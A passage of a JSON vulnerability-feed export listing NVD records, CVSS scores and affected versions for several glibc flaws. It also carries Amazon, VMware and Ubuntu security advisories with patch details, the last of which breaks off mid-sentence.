"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4609", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:gnu:glibc:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.14:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.13:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.2:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:40:09", "description": "Integer overflow in the __tzfile_read function in glibc before 2.15 allows context-dependent attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted timezone (TZ) file, as demonstrated using vsftpd.", "edition": 6, "cvss3": {}, "published": "2013-05-02T14:55:00", "title": "CVE-2009-5029", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-5029"], "modified": "2013-05-03T12:39:00", "cpe": ["cpe:/a:gnu:glibc:2.1.3", "cpe:/a:gnu:glibc:2.1.1", "cpe:/a:gnu:glibc:2.0.3", "cpe:/a:gnu:glibc:2.1.2", "cpe:/a:gnu:glibc:2.1.1.6", "cpe:/a:gnu:glibc:2.14", "cpe:/a:gnu:glibc:2.0", "cpe:/a:gnu:glibc:2.13", 
"cpe:/a:gnu:glibc:2.0.2", "cpe:/a:gnu:glibc:2.0.4", "cpe:/a:gnu:glibc:2.1", "cpe:/a:gnu:glibc:2.0.6", "cpe:/a:gnu:glibc:2.0.5", "cpe:/a:gnu:glibc:2.0.1", "cpe:/a:gnu:glibc:2.1.9"], "id": "CVE-2009-5029", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-5029", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:gnu:glibc:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.14:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.13:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.2:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:51:00", "description": "The addmntent function in the GNU C Library (aka glibc or libc6) 2.13 and earlier does not report an error status for failed attempts to write to the /etc/mtab file, which makes it easier for local users to trigger corruption of this file, as demonstrated by writes from a process with a small RLIMIT_FSIZE value, a different vulnerability than CVE-2010-0296.", "edition": 6, "cvss3": {}, "published": "2011-04-10T02:55:00", "title": "CVE-2011-1089", "type": "cve", "cwe": ["CWE-16"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.3, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 4.9, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1089"], "modified": "2016-12-07T18:15:00", "cpe": ["cpe:/a:gnu:glibc:2.3.6", "cpe:/a:gnu:glibc:2.12.1", "cpe:/a:gnu:glibc:2.1.3", "cpe:/a:gnu:glibc:2.12.0", "cpe:/a:gnu:glibc:2.12.2", "cpe:/a:gnu:glibc:1.09.1", "cpe:/a:gnu:glibc:2.1.1", "cpe:/a:gnu:glibc:2.3.10", "cpe:/a:gnu:glibc:2.11.3", "cpe:/a:gnu:glibc:1.05", "cpe:/a:gnu:glibc:1.02", "cpe:/a:gnu:glibc:2.2", "cpe:/a:gnu:glibc:2.0.3", "cpe:/a:gnu:glibc:2.3.3", "cpe:/a:gnu:glibc:1.08", "cpe:/a:gnu:glibc:2.1.2", "cpe:/a:gnu:glibc:2.9", "cpe:/a:gnu:glibc:1.07", "cpe:/a:gnu:glibc:2.1.1.6", "cpe:/a:gnu:glibc:2.10.2", "cpe:/a:gnu:glibc:2.11", "cpe:/a:gnu:glibc:2.0", "cpe:/a:gnu:glibc:2.3", "cpe:/a:gnu:glibc:2.4", "cpe:/a:gnu:glibc:2.11.1", "cpe:/a:gnu:glibc:2.13", "cpe:/a:gnu:glibc:2.6", "cpe:/a:gnu:glibc:2.2.2", "cpe:/a:gnu:glibc:2.2.5", "cpe:/a:gnu:glibc:1.09", "cpe:/a:gnu:glibc:2.2.3", "cpe:/a:gnu:glibc:2.10", "cpe:/a:gnu:glibc:2.6.1", "cpe:/a:gnu:glibc:2.0.2", "cpe:/a:gnu:glibc:1.01", "cpe:/a:gnu:glibc:1.00", "cpe:/a:gnu:glibc:1.03", "cpe:/a:gnu:glibc:2.2.4", "cpe:/a:gnu:glibc:1.06", "cpe:/a:gnu:glibc:2.10.1", "cpe:/a:gnu:glibc:2.0.4", "cpe:/a:gnu:glibc:2.1", "cpe:/a:gnu:glibc:2.0.6", "cpe:/a:gnu:glibc:2.5.1", "cpe:/a:gnu:glibc:2.0.5", "cpe:/a:gnu:glibc:2.11.2", "cpe:/a:gnu:glibc:2.7", "cpe:/a:gnu:glibc:1.04", "cpe:/a:gnu:glibc:2.0.1", "cpe:/a:gnu:glibc:2.1.3.10", "cpe:/a:gnu:glibc:2.3.2", "cpe:/a:gnu:glibc:2.8", "cpe:/a:gnu:glibc:2.2.1", "cpe:/a:gnu:glibc:2.3.4", "cpe:/a:gnu:glibc:2.1.9", "cpe:/a:gnu:glibc:2.3.5", "cpe:/a:gnu:glibc:2.5", "cpe:/a:gnu:glibc:2.3.1"], "id": "CVE-2011-1089", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1089", "cvss": {"score": 3.3, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:a:gnu:glibc:2.8:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.10.1:*:*:*:*:*:*:*", 
"cpe:2.3:a:gnu:glibc:1.05:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:1.01:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.7:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.9:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.11.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:1.09.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:1.09:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.13:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:1.07:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.12.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.12.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:1.02:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:1.04:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.12.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.11.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:1.08:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:1.00:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:1.03:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:1.06:*:*:*:*:*:*:*", 
"cpe:2.3:a:gnu:glibc:2.11:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.10:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.10.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.2.3:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:44:56", "description": "Integer signedness error in the elf_get_dynamic_info function in elf/dynamic-link.h in ld.so in the GNU C Library (aka glibc or libc6) 2.0.1 through 2.11.1, when the --verify option is used, allows user-assisted remote attackers to execute arbitrary code via a crafted ELF program with a negative value for a certain d_tag structure member in the ELF header.", "edition": 4, "cvss3": {}, "published": "2010-06-01T20:30:00", "title": "CVE-2010-0830", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0830"], "modified": "2017-08-17T01:32:00", "cpe": ["cpe:/a:gnu:glibc:2.3.6", "cpe:/a:gnu:glibc:2.1.3", "cpe:/a:gnu:glibc:2.1.1", "cpe:/a:gnu:glibc:2.3.10", "cpe:/a:gnu:glibc:2.2", "cpe:/a:gnu:glibc:2.0.3", "cpe:/a:gnu:glibc:2.3.3", "cpe:/a:gnu:glibc:2.1.2", "cpe:/a:gnu:glibc:2.9", "cpe:/a:gnu:glibc:2.1.1.6", "cpe:/a:gnu:glibc:2.11", "cpe:/a:gnu:glibc:2.3", "cpe:/a:gnu:glibc:2.4", "cpe:/a:gnu:glibc:2.11.1", "cpe:/a:gnu:glibc:2.6", "cpe:/a:gnu:glibc:2.2.2", "cpe:/a:gnu:glibc:2.2.5", "cpe:/a:gnu:glibc:2.2.3", "cpe:/a:gnu:glibc:2.10", "cpe:/a:gnu:glibc:2.6.1", "cpe:/a:gnu:glibc:2.0.2", "cpe:/a:gnu:glibc:2.2.4", 
"cpe:/a:gnu:glibc:2.10.1", "cpe:/a:gnu:glibc:2.0.4", "cpe:/a:gnu:glibc:2.1", "cpe:/a:gnu:glibc:2.0.6", "cpe:/a:gnu:glibc:2.5.1", "cpe:/a:gnu:glibc:2.0.5", "cpe:/a:gnu:glibc:2.7", "cpe:/a:gnu:glibc:2.0.1", "cpe:/a:gnu:glibc:2.3.2", "cpe:/a:gnu:glibc:2.8", "cpe:/a:gnu:glibc:2.2.1", "cpe:/a:gnu:glibc:2.3.4", "cpe:/a:gnu:glibc:2.1.9", "cpe:/a:gnu:glibc:2.3.5", "cpe:/a:gnu:glibc:2.5", "cpe:/a:gnu:glibc:2.3.1"], "id": "CVE-2010-0830", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-0830", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:gnu:glibc:2.8:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.10.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.7:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.9:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.11:*:*:*:*:*:*:*", 
"cpe:2.3:a:gnu:glibc:2.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.10:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:glibc:2.2.3:*:*:*:*:*:*:*"]}], "amazon": [{"lastseen": "2020-11-10T12:35:04", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4609", "CVE-2009-5029"], "description": "**Issue Overview:**\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the way the glibc library read timezone files. If a carefully-crafted timezone file was loaded by an application linked against glibc, it could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application. ([CVE-2009-5029 __](<https://access.redhat.com/security/cve/CVE-2009-5029>))\n\nA denial of service flaw was found in the remote procedure call (RPC) implementation in glibc. A remote attacker able to open a large number of connections to an RPC service that is using the RPC implementation from glibc, could use this flaw to make that service use an excessive amount of CPU time. 
([CVE-2011-4609 __](<https://access.redhat.com/security/cve/CVE-2011-4609>))\n\n \n**Affected Packages:** \n\n\nglibc\n\n \n**Issue Correction:** \nRun _yum update glibc_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n glibc-debuginfo-common-2.12-1.47.32.amzn1.i686 \n glibc-common-2.12-1.47.32.amzn1.i686 \n glibc-debuginfo-2.12-1.47.32.amzn1.i686 \n glibc-devel-2.12-1.47.32.amzn1.i686 \n glibc-2.12-1.47.32.amzn1.i686 \n glibc-utils-2.12-1.47.32.amzn1.i686 \n nscd-2.12-1.47.32.amzn1.i686 \n glibc-headers-2.12-1.47.32.amzn1.i686 \n glibc-static-2.12-1.47.32.amzn1.i686 \n \n src: \n glibc-2.12-1.47.32.amzn1.src \n \n x86_64: \n glibc-devel-2.12-1.47.32.amzn1.x86_64 \n glibc-static-2.12-1.47.32.amzn1.x86_64 \n glibc-debuginfo-common-2.12-1.47.32.amzn1.x86_64 \n glibc-utils-2.12-1.47.32.amzn1.x86_64 \n glibc-common-2.12-1.47.32.amzn1.x86_64 \n glibc-headers-2.12-1.47.32.amzn1.x86_64 \n glibc-2.12-1.47.32.amzn1.x86_64 \n glibc-debuginfo-2.12-1.47.32.amzn1.x86_64 \n nscd-2.12-1.47.32.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2012-02-02T14:26:00", "published": "2012-02-02T14:26:00", "id": "ALAS-2012-039", "href": "https://alas.aws.amazon.com/ALAS-2012-39.html", "title": "Medium: glibc", "type": "amazon", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:46", "bulletinFamily": "software", "cvelist": ["CVE-2012-0864", "CVE-2011-4609", "CVE-2012-6325", "CVE-2012-3404", "CVE-2012-6324", "CVE-2012-3405", "CVE-2010-0830", "CVE-2012-3480", "CVE-2009-5029", "CVE-2012-3406", "CVE-2011-1089", "CVE-2009-5064"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n VMware Security Advisory\r\n\r\nAdvisory ID: VMSA-2012-0018\r\nSynopsis: VMware security updates for vCSA and ESXi\r\nIssue date: 2012-12-20\r\nUpdated on: 2012-12-20 (initial advisory)\r\nCVE numbers: ------------- vCSA ---------------\r\n CVE-2012-6324, CVE-2012-6325\r\n ------------- glibc 
--------------\r\n CVE-2009-5029, CVE-2009-5064, CVE-2010-0830,\r\n CVE-2011-1089, CVE-2011-4609, CVE-2012-0864,\r\n CVE-2012-3404, CVE-2012-3405, CVE-2012-3406,\r\n CVE-2012-3480\r\n\r\n- --------------------------------------------------------------------\r\n\r\n1. Summary\r\n\r\n VMware has updated vCenter Server Appliance (vCSA) and ESX to \r\n address multiple security vulnerabilities\r\n\r\n2. Relevant releases\r\n\r\n vCenter Server Appliance 5.1 without Patch 1\r\n vCenter Server Appliance 5.0 without Update 2\r\n\r\n VMware ESXi 5.1 without patch ESXi510-201212101\r\n VMware ESXi 5.0 without patch ESXi500-201212101\r\n\r\n3. Problem Description\r\n\r\n a. vCenter Server Appliance directory traversal\r\n\r\n The vCenter Server Appliance (vCSA) contains a directory\r\n traversal vulnerability that allows an authenticated \r\n remote user to retrieve arbitrary files. Exploitation of\r\n this issue may expose sensitive information stored on the \r\n server. \r\n\r\n VMware would like to thank Alexander Minozhenko from ERPScan for\r\n reporting this issue to us.\r\n\r\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\r\n has assigned the name CVE-2012-6324 to this issue.\r\n\r\n Column 4 of the following table lists the action required to\r\n remediate the vulnerability in each release, if a solution is\r\n available.\r\n\r\n VMware Product Running Replace with/\r\n Product Version on Apply Patch\r\n ============== ======== ======= =================\r\n vCSA 5.1 Linux vCSA 5.1 Patch 1\r\n vCSA 5.0 Linux vCSA 5.0 Update 2\r\n\r\n b. vCenter Server Appliance arbitrary file download\r\n\r\n The vCenter Server Appliance (vCSA) contains an XML parsing \r\n vulnerability that allows an authenticated remote user to\r\n retrieve arbitrary files. 
Exploitation of this issue may\r\n expose sensitive information stored on the server.\r\n\r\n VMware would like to thank Alexander Minozhenko from ERPScan for\r\n reporting this issue to us.\r\n\r\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\r\n has assigned the name CVE-2012-6325 to this issue.\r\n\r\n Column 4 of the following table lists the action required to\r\n remediate the vulnerability in each release, if a solution is\r\n available.\r\n\r\n VMware Product Running Replace with/\r\n Product Version on Apply Patch\r\n ============== ======== ======= =================\r\n vCSA 5.1 Linux not affected\r\n vCSA 5.0 Linux vCSA 5.0 Update 2\r\n\r\nc. Update to ESX glibc package\r\n\r\n The ESX glibc package is updated to version glibc-2.5-81.el5_8.1\r\n to resolve multiple security issues.\r\n\r\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\r\n has assigned the names CVE-2009-5029, CVE-2009-5064,\r\n CVE-2010-0830, CVE-2011-1089, CVE-2011-4609, CVE-2012-0864\r\n CVE-2012-3404, CVE-2012-3405, CVE-2012-3406 and CVE-2012-3480\r\n to these issues.\r\n\r\n Column 4 of the following table lists the action required to\r\n remediate the vulnerability in each release, if a solution is\r\n available.\r\n\r\n VMware Product Running Replace with/\r\n Product Version on Apply Patch\r\n ============== ======== ======= =================\r\n ESXi 5.1 ESXi ESXi510-201212101\r\n ESXi 5.0 ESXi ESXi500-201212101\r\n ESXi 4.1 ESXi no patch planned\r\n ESXi 4.0 ESXi no patch planned\r\n ESXi 3.5 ESXi not applicable\r\n\r\n ESX any ESX not applicable\r\n\r\n4. 
Solution\r\n\r\n Please review the patch/release notes for your product and\r\n version and verify the checksum of your downloaded file.\r\n\r\n\r\n ESXi and ESX\r\n ------------\r\n The download for ESXi includes vCenter Server Appliance.\r\n\r\n\r\n https://downloads.vmware.com/go/selfsupport-download\r\n\r\n ESXi 5.1\r\n http://kb.vmware.com/kb/2035775\r\n\r\n ESXi 5.0\r\n http://kb.vmware.com/kb/2033751\r\n\r\n5. References\r\n\r\n ------------- vCSA ---------------\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6324\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6325\r\n ------------- glibc --------------\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-5029\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-5064\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0830\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1089\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4609\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0864\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3404\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3405\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3406\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3480\r\n\r\n- --------------------------------------------------------------------\r\n\r\n6. Change log\r\n\r\n 2012-12-20 VMSA-2012-0018\r\n Initial security advisory in conjunction with the release of\r\n vSphere 5.1 Patch 1 and vSphere 5.0 Update 2 on 2012-12-20.\r\n\r\n- --------------------------------------------------------------------\r\n\r\n7. 
Contact\r\n\r\n E-mail list for product security notifications and announcements:\r\n http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce\r\n\r\n This Security Advisory is posted to the following lists:\r\n\r\n * security-announce at lists.vmware.com\r\n * bugtraq at securityfocus.com\r\n * full-disclosure at lists.grok.org.uk\r\n\r\n E-mail: security at vmware.com\r\n PGP key at: http://kb.vmware.com/kb/1055\r\n\r\n VMware Security Advisories\r\n http://www.vmware.com/security/advisories\r\n\r\n VMware security response policy\r\n http://www.vmware.com/support/policies/security_response.html\r\n\r\n General support life cycle policy\r\n http://www.vmware.com/support/policies/eos.html\r\n\r\n VMware Infrastructure support life cycle policy\r\n http://www.vmware.com/support/policies/eos_vi.html\r\n\r\n Copyright 2012 VMware Inc. All rights reserved.\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP Desktop 10.2.0 (Build 2599)\r\nCharset: utf-8\r\n\r\nwj8DBQFQ01bsDEcm8Vbi9kMRAkXEAJoClYysvoV67RKiZ0uN1YszPcN0LQCg8QMV\r\nOWjpV7Bnt27472i5EOhk9fI=\r\n=jrDP\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2013-01-02T00:00:00", "published": "2013-01-02T00:00:00", "id": "SECURITYVULNS:DOC:28907", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28907", "title": "VMSA-2012-0018 VMware security updates for vCSA and ESXi", "type": "securityvulns", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:44", "bulletinFamily": "software", "cvelist": ["CVE-2012-0864", "CVE-2010-0015", "CVE-2011-4609", "CVE-2011-1658", "CVE-2011-1659", "CVE-2011-1071", "CVE-2011-1095", "CVE-2009-5029", "CVE-2011-2702", "CVE-2011-1089"], "description": "==========================================================================\r\nUbuntu Security Notice USN-1396-1\r\nMarch 09, 2012\r\n\r\neglibc, glibc 
vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 11.10\r\n- Ubuntu 11.04\r\n- Ubuntu 10.10\r\n- Ubuntu 10.04 LTS\r\n- Ubuntu 8.04 LTS\r\n\r\nSummary:\r\n\r\nMultiple vulnerabilities were discovered and fixed in the GNU C Library.\r\n\r\nSoftware Description:\r\n- eglibc: Embedded GNU C Library: sources\r\n- glibc: GNU C Library: Documentation\r\n\r\nDetails:\r\n\r\nIt was discovered that the GNU C Library did not properly handle\r\ninteger overflows in the timezone handling code. An attacker could use\r\nthis to possibly execute arbitrary code by convincing an application\r\nto load a maliciously constructed tzfile. (CVE-2009-5029)\r\n\r\nIt was discovered that the GNU C Library did not properly handle\r\npasswd.adjunct.byname map entries in the Network Information Service\r\n(NIS) code in the name service caching daemon (nscd). An attacker\r\ncould use this to obtain the encrypted passwords of NIS accounts.\r\nThis issue only affected Ubuntu 8.04 LTS. (CVE-2010-0015)\r\n\r\nChris Evans reported that the GNU C Library did not properly\r\ncalculate the amount of memory to allocate in the fnmatch() code. An\r\nattacker could use this to cause a denial of service or possibly\r\nexecute arbitrary code via a maliciously crafted UTF-8 string.\r\nThis issue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS and Ubuntu\r\n10.10. (CVE-2011-1071)\r\n\r\nTomas Hoger reported that an additional integer overflow was 